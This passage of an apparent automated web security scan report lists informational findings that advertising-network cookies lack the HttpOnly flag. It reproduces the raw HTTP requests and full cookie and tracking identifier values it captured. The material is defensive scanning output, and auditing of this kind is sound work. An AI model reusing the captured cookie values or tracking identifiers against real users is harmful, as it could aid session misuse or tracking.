id=cc8d5c338000050|2588783/933076/15138|t=1307964404|et=730|cs=wbm9vkwb; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:26:44 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:26:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.41. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:07 GMT; Path=/
adImpCount=Cwq2GXGZMei0H6QRLFUWcgEzref2sQrvavFxeBByhwbG9Vs0lhNmAOrbA6BngiGu4vO0ygBXT7yKYydTIPtfk69H81IDSLR6XFCdfBEraHoHGwkOu-gn9s9EeeNrsNGLLA3nVVCBV6S_HCt4ul3HgSeuVhjqt4bzhbR2UrsOkAaE32ud4RfpxaJoBfXGZrRy2Bm3OHRNJuPJWm_u8AKXJ-Lq_12Rg25xtn3uTjSRzNjtIdlZav5LCaukNdINLIBPOFzb2lfSb2leKU62lyfe6oZUfy3cXERUlCbqf8bsFRDyIaTFIkAhb3O3_LfSj2D5zTu1xTABVuNBEjnQ7vQQlPwyqQd2kbcK6pvFQq-teAoLiST7x1GpJOjqaN2tR5kAYMps0hV4AuinP3IuoTyqBob-2qV2PRWg1D8SUwxYaEQFd8HpXzvs6OGZs9MqVMapxkzutrtWP-qhB9OfJQcvYHUbCLOdCASkmpn5H1zQiGL1mTvlVxq4kSctfknExbayqdAXWOgJeSF4J0CON8b5QZmdIlwYAD9OSKKN3Z7fa4Ifz6137vw1WRoGbxwsKWSnA2zovzUc76Tv1dBxqAuUWLbTNinx2VfUPWZEdO2Vy9VPvIk4l7uU-O46_JSAKJSaUIgjS9UzEBdyqIWT0SRhTjl3nZWj9DidA81bJpnYNWrizMSpzYJMZtxpnUFnah6riFwjJqLCroXwt55DUqJ9OxUiaJvJ3P8PjM_9LgSzB03-UDfgeKp_OSq1jV5EcY62jNnGwcm-v2Nc9ZUxrI5bArbFa4PhhzaWR_KoZyJmYtXKTCkVOSP7aMISPsMA-5rYZ6569AsLsth-iaBhgN4Y6oZUfy3cXERUlCbqf8bsFRCBoYnFScze6h4OQ8WDVtdszTu1xTABVuNBEjnQ7vQQlNsVabdjKJKhhCPvL4EA7VcHuAqFwiZZMCmLrNGrJ0WgYMps0hV4AuinP3IuoTyqBsa_PVtoNyD9YpIYrkswKlAFd8HpXzvs6OGZs9MqVMapM5v7pjR5GrWmy9D1ZMBDCPNm3FpXWJpPS8Rd_pZlWzvwMzO6hvz2FFiqch_RNwsPdqdyfXiXadvcoLjJc7MOB5mdIlwYAD9OSKKN3Z7fa4LkQL8LG1Xswle8pfz9MJgEQXxGYeBYfEO7xs5kfkscQ7bTNinx2VfUPWZEdO2Vy9XUc2wNpvMvPpne776QsqUDf_554SpIK3huzkg3GmVfA5mKdG9wfEgTrZ_HpdUxB4dqNvAVr3IxjVMU-dESpumxPmlnE2DerArFS73waNvuuw-VNoXnxHFwCUybMxiGRez-UDfgeKp_OSq1jV5EcY622S2W6vMqZ73lnXroBZZCIJlmoAI3Z7CCJpRgIdqQc9gLvfxtEfIP3Mgu2HVCMyT6fVMpRA9COvxPm9GhrTVpFEJedvFh7IcKMPUZKG4a25Wjp4-4VHiVBWhL8kZTTHUEEZYjqWmNkbYMJXxYwXP0ivAhMyG7WiBdMtmZpxmib65elynrVX8L3tctyWPQ981dRhSgyH_YKyzwaHs2OOwPKnlcd_rDI1guq3jW_XwqTcptUMsF14GuE97T3OQgmtAND1aJVVaBwrOt4alj6Rzt3asNA2mupPotO89J1M7GQCdYA6mZQORv9NCOuHD8W8Pvw2E0XpC8MoXcUC9EvLIqDJ81dnOBqEIp9UcyJdU0s2dZNadKv1nmwVh0nQMBiUozDyDUfzSD4FrO8H9TmnOs2Fy1WnPRG1FVm_158R84SQUDDvn5qzXJjLZ8wMOpH2VUidMby9e0xx7EjmD_qe07bBW51WNe_vXSrH8j3OikfOix0YnsBLVPpvnCKqaSleld2e3m3LW2izkTUCvyig6f_Eclre2oYPrXXUlbckOsOzfRHfKboHgAiyeCSD5Se3Dt56JQiT9BBtDU5zYNi_NmUreJTf9EU_tOkHRKVO8_mZbQn_ugqOPPFtBuaLGREhiwAxwF5V3jVoK_k0gd7-0t-3eGamYwoDBKdRj9ba9srGKI4cyR91DkfUnGp4CZ2XEUoJZsEQUz1fHuz4KOaEydExDOy-LVKsTbwD47PQ_oY1hwd2q0YscxgOJlsuZESQbJ8HwN9NuhIP_XkX8rtxuP1vl02wF4SENfz2Fj675JocuLm7OAT5SFH2tFhbfFwaSAApIOivosg1964XuUP-GJuvlylYdlQism6wYOEgBb5mpARyrnCVTyHMraYxPOz8XD_c4CB9kh1yXHfva0bF4OdGSzW48YkHeAOVnkOQhtDEIT-1TinU9HRCvu0Gtkelb7fNXObEOkeVNzBQV4WNG7kjfx8tr60k9qg9ATsnYoAeYFeILKS7IQkEsa_85wHumQH0xMx7s4D1jmw4B16C4dfLDNJ-gPuRisqlbSj9DSEz6LzaeaxPegNDw7D2m29-GigZE992_yjCE9D1lgk4BbLcqppQh5sKeMuo2J2dJ0h1G9-2A9WFlHdxjJG9OLWNQkS5uDrWjE8SWU1vESIjDaXQpIM7LHxEoX3lasSLfZcdAUw8CfNlZGPI9gjRxNjfZoV4P_bH3J1EiZLTliURG_QleD_2x9ydRImS05YlERv0IXzbHMdGRmx9f-wRr20Y1tF82xzHRkZsfX_sEa9tGNbanNXcRuj-D2o5vqE4DX4xevSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bq9JATch8tb6XeYutvUING6vSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bs3n6i53yAgbyR6eCHv0eMaIQAic5LsZDONJrUq6wbmYt43Cfg48Vc1r1TQiy_8-cCu5xswhjSp4pbQzt7RFH68NVw7Vie7EmZwU76g-TKghLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsXuVT5JvF1W1aNjuoRaF-mkaxwhgTvGuwVCBlXozift5GscIYE7xrsFQgZV6M4n7eRrHCGBO8a7BUIGVejOJ-3kaxwhgTvGuwVCBlXozift4idoMR_SdzxDZ7G_w0clccS1fjlw50aU0NkdmzBnRWmOAIigblI_jtBLUcZYZrXOPgCIoG5SP47QS1HGWGa1zjl1bauoagZ1M1iCJfLP80Dzy3yIwjhg81IAYzHszNaYX3wDcbsxOHjC1U5u4EiJuIVYDsGs8HA9ebgXcdSEZwfKe3Y57IiZneII5Ka6gzHwRfJJa1hX06djW9VmjlVrjyXySWtYV9OnY1vVZo5Va48l8klrWFfTp2Nb1WaOVWuPLF4I5dA1vXKb0IGHGC-Ole5vLq95iSQ2aeieaQBbTOIuby6veYkkNmnonmkAW0ziLm8ur3mJJDZp6J5pAFtM4iS8drDvH2GHnX7T1P8D_iX1ra1gA5Wy-ov38a7zRUR_Fn3VEss7RQ9Tyo1qT5AwESaWr1xXE0MIDwS9tWvxZrnGhxCyOEwJ6UEOxJDdP_5dhocQsjhMCelBDsSQ3T_-XYaHELI4TAnpQQ7EkN0__l2LzzRIHgCvOQow5SgLAWHHexSsvN7MDtJFV6wRit1nx5; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:07 GMT; Path=/
fc=GNnbBD3qiHnaSVYBbCSNLvLBUhuH6wslcqkNHBZUaKb7Nj5bGHqXk2A06xn0orl8mNEYHvmDrveO6RDJcMVxDYiks48zuVvaWDQAx0VVo3zPum_b70FfKpk3ju4oVkvZHC9go-mOaxov-BH8bOfKSItsuggz1E_U4uiXlRjdb9A78oQh5uLMFfvKDXObt_rS1aeprWaIP6vaZTV9xdfPWhdQ9SbRVPlctyZfmBFwploXR8qslufNm6r8H5hh1jnufuj8s2SsJjw03czPperUqzHVjXTBrUPRIETuoZhexzc; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:07 GMT; Path=/
pf=3R3SKUUPFCoio1bGZvjNrz90sCTbjJoMGNRY49lN3lkdCPfTl6GVwLxMGMWABO2Hxhx5ALNZJagJ4MhMImSgO1j9Fw_ghz_PVAPwGCUX-93yzKimGqsD0iB4nMRqsP7Fo2p_sYe6FK71YFv8XCcCotMv9o6pa5vGMMnD4OdosTAdkTDGhgbOPz347HKULaPudC7UMMqtU-uTINCqeO5OuEL9QOcm54oK_vUb9hh6U2buGh5RH_9bIiRxjGlPA1strChLkPILqDevF3_ytWn-kDXnP7WTJzn5hC7GC86BA-XH4AovFAW5wYg3d6HNexkTzFpNF3hh_ymVCgGfBkee1knPZNXIe9A8BgTIbvpehe-k2s4kcWWbQbjBvv9DiSP3qKDEyZKkj9qg203fyq2TFtojUIBz8h_-Icn9K-ai00y2wJhpV1cKL0hO0j9B54GVhm47us_Csn3kHJ43JP-qHSBc4w9COMv7vDAXkl7P7uNQSKyLC2RsYFceW-v9Ivp_YD2RLpMpzj0AYE_Zac9hK_NAdWBQHVl-JPRF5hS10YO-4pC3ilKbQpP5MzC5Uc_kTeP1VDFWEeG9aPxYlZoS7h6d7CFXLgzFaAgYaTkStmC-QV4C2xn7TxBeOjVll9oOUmyWQqI6LTbGJiqxEuhQYn8rJzZ-n49wBvicimKkWWRsjPuConU0rTmVj5rk3Zs478f5w22ir_fCTLujc_dkGDf0XNwyIx4tuYj5ActmcnGU_ut7QWRoiVW-tzSSU50x81pN6PeKUPuttBCxxLR0bEXGPVB-KlOMchJXjiQA7q3qw9rqhVwrLsR04UQUf7H1SHNsnfeE9yPoFSHW8Ezu0u0_r320et_4BxanRu3aW6Od71gQ6z-o93xNve-0ihCBKuKRbYoeHkykGEWzpMqgE9YnGohfIt52_gTsgQl00yAdh_1PkFeE4BUm4Q3ZCHxVw0-Ht2JclSnzBdXwhsQ8i70yFd1p7EY1gmjobjhbl8py5vR-6hrOrfCxLuN-5IAUz5HNvuzTEFxauVGTueM8Vp8as4FPdyDpeeEni4cNLaW7CdLTrgTa3qKWD-Da3R0DjXbBpZz989wk0yGmAtqC-6oLvpO-g-SUTn1I2hqfIKAwJ3K0R_C6aRCJA-6dRcmmRsm2dg998jlQIlrO-XAkIu866aiXxhF5vdmmj1Eq8cbMUvEoglbvObqHTXsaSeX3eyilQCKGOvUGrC3yg6quWbT2J4_FGa1rnHzs2HLwdHSIZhxNbxZ4Mnp1HWQFNlPcrJU_yok8WE0ucKkz3qneksiNhOxeYM51PbZBqQ7Z19PwLp1_APilk3LxHIqi5G66d8e_Z2cttmvTBWPAwvjWXHUfoLAQIZBbvbOhN6bREB_SWupoTcy14leZYRR7uP8E2pWNOdbM6oDzpMYKXjYhY4TLX48ZxcpEi0fIE7tOoo9uHkNvFNmNnM23DFeCFVuTjHka8m_2046CrJExuL1gg3GmsPZlMaV4X8N_6aHpYtroERlavtLZfEjz7mA1A0AfxCzqqnQSvo_Cvx-wKsT0cw; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:07 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.42. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:19:43 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4dce55b134194; expires=Thu, 14-Jul-2011 11:20:04 GMT; path=/
i_1=46:1354:269:44:0:48594:1307964004:L|46:1354:804:44:0:48594:1307963457:L|33:1411:1148:100:0:43835:1307361371:B2; expires=Thu, 14-Jul-2011 11:20:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**;10,3,181;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F%3B_ylt%3DAtqNTgBHv4UdcezC5xaY6tfTjdIF?click=http://global.ard.yahoo.com/SIG=15lksbmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778?click=http://global.ard.yahoo.com/SIG=15lksbmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=33:1411:1148:100:0:43835:1307361371:B2|33:353:198:141:0:43835:1307361205:B2|33:1391:835:0:0:43835:1307361203:B2

Response

13.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4dce55b134194; expires=Thu, 14-Jul-2011 12:11:14 GMT; path=/
i_1=46:1354:804:44:0:44375:1307967074:B2|46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L; expires=Thu, 14-Jul-2011 12:11:14 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**;10,3,181;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F%3B_ylt%3DAtqNTgBHv4UdcezC5xaY6tfTjdIF?click=http://global.ard.yahoo.com/SIG=15l3jj0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536?click=http://global.ard.yahoo.com/SIG=15l3jj0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:48594:1307963457:L|33:1411:1148:100:0:43835:1307361371:B2|33:353:198:141:0:43835:1307361205:B2

Response

13.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4dce55b134194; expires=Thu, 14-Jul-2011 13:11:14 GMT; path=/
i_1=46:1354:269:44:0:44377:1307970674:B2|46:1354:804:44:0:44377:1307970673:B2|46:1354:804:44:0:44375:1307967073:B2; expires=Thu, 14-Jul-2011 13:11:14 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**;10,3,181;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F%3B_ylt%3DAtqNTgBHv4UdcezC5xaY6tfTjdIF?click=http://global.ard.yahoo.com/SIG=15lg50rvp/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307977872/L=niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG/B=BQlNDWKL5Rc-/J=1307970672373026/K=DMPXuK5kN6E_8iwMoxBYgQ/A=6304414/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131?click=http://global.ard.yahoo.com/SIG=15lg50rvp/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307977872/L=niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG/B=BQlNDWKL5Rc-/J=1307970672373026/K=DMPXuK5kN6E_8iwMoxBYgQ/A=6304414/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L|33:1411:1148:100:0:43835:1307361371:B2

Response

13.46. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ih="b!!!!G!'4@g!!!!#=$KA3!)AU6!!!!#='htn!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!$='htu!.`.U!!!!#='htS!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2"; path=/; expires=Wed, 12-Jun-2013 11:03:15 GMT
vuday1=!!!!#?:rWIGf(n`NBHr8/<?Sv; path=/; expires=Tue, 14-Jun-2011 00:00:00 GMT
pv1="b!!!!'!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!#Jl?!$5*F!$uj6!.#:D!%^Pa!!!!$!?5%!$8Ip,!@Dj0!'jh]~~~~~~~='htu=(g[7!!!(["; path=/; expires=Wed, 12-Jun-2013 11:03:15 GMT
BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?UbwUAKamGwArOGcAAAAAAFB0IgAAAAAAAgAAAAoAAAAAAP8AAAACB4gtLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACg6wEAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABl1IWa7dI-CjC5RC68xQYCFUS-ABfl6WkI1WroAAAAAA==,,http%3A%2F%2Fadopt.imiclk.com%2Femb%2Fq%3F01ad%3D2-2-b0214141ded1291a4ff0463d9e06444bd5100362c216df15cc667f2767bc1758-991ad395e12a9826d82de593d62cfbcfae28214d0237d0e3f7994e1df381cb11%2601ri%3D6bdf326c1d1d9d9%2601na%3D%26size%3D160x600%26m%3D3%26l%3D1575606%26c%3D162,B%3D10%26Z%3D160x600%26_salt%3D3382701272%26r%3D0%26s%3D1812134,b9573eaa-95ac-11e0-bfb6-1cc1de044292 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://adopt.imiclk.com/emb/q?01AD=2-2-B0214141DED1291A4FF0463D9E06444BD5100362C216DF15CC667F2767BC1758-991AD395E12A9826D82DE593D62CFBCFAE28214D0237D0E3F7994E1DF381CB11&01RI=6BDF326C1D1D9D9&01NA=&size=160x600&m=3&l=1575606&c=162
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!*!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$%ST~!%.B?!1UC$!%`n`!!!!$!?5%!$8o10!ZmB)!'mla!'me'~~~~~~=$G!==%EaVM.jTN!#+s2!,x.^!%)<k!0)2c!$tyl!6Z#3!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Jsh='HAD!!!([!#2Jp!,x.^!%)<k!2A@,!$u!!!7MU<!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Ju6='T?<!!!([!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!#Jl?!,x.^!%)<k!.#:A!%IaL!H<'$!?5%!(L(6:!w1K*!(#l)!#Ae[!%f(g~~~~~=$L#)=%JbC!!!([!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; bh="b!!!%*!!!?J!!!!(=$_d[!!(1-!!!!+=%=]S!!*lZ!!!!#=$Wj6!!*oY!!!!$=%@(m!!,WM!!!!#=$Wj6!!-?2!!!!)=%@(m!!-O3!!!!)=%@(m!!..X!!!!'=$L=p!!/GK!!!!+=%=]S!!/GR!!!!+=%=]S!!/Ju!!!!#=$_d[!!/K$!!!!%=%=]S!!/i,!!!!*=%@(m!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!*=%@(m!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!%=%=]S!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!,=%=]S!!J<K!!!!,=%=]S!!J<O!!!!*=%=]S!!J<S!!!!,=%=]S!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!*=%@(m!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!$=%@(m!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!)=%@(m!!Zwb!!!!$=%@(m!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!,=%=]S!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!$=%@(m!!kl,!!!!$=%@(m!!mL?!!!!#=%=pu!!mo!!!!!$=%@(m!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!$=%@(m!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!*=%@(m!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!*=%=]S!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!*=%=]S!#MTF!!!!'=%=]S!#MTH!!!!,=%=]S!#MTI!!!!,=%=]S!#MTJ!!!!,=%=]S!#Nyi!!!!#=!eq^!#O29!!!!(=%@(m!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!*=%@(m!#Sq>!!!!#='>m<!#T,d~~!#T^F!!!!#=!yv!!#UDQ!!!!,=%=]S!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!$=%@(m!#Z8E!!!!)=%@(m!#]%`!!!!#=#33)!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Z!!!!!(=%@(m!#]Z#!!!!$=%@(m!#]w)!!!!*=%=]S!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!*=%@(m!#^d6!!!!#=#33)!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!)=%@(m!#`-Z!!!!$=%=]S!#`-[!!!!$=%=]S!#`U0!!!!$=%@(m!#`cS!!!!#=%id8!#a=6!!!!$=%@(m!#a=7!!!!$=%@(m!#a=9!!!!$=%@(m!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#bj8!!!!#=#mS:!#c-O!!!!+=%Vw)!#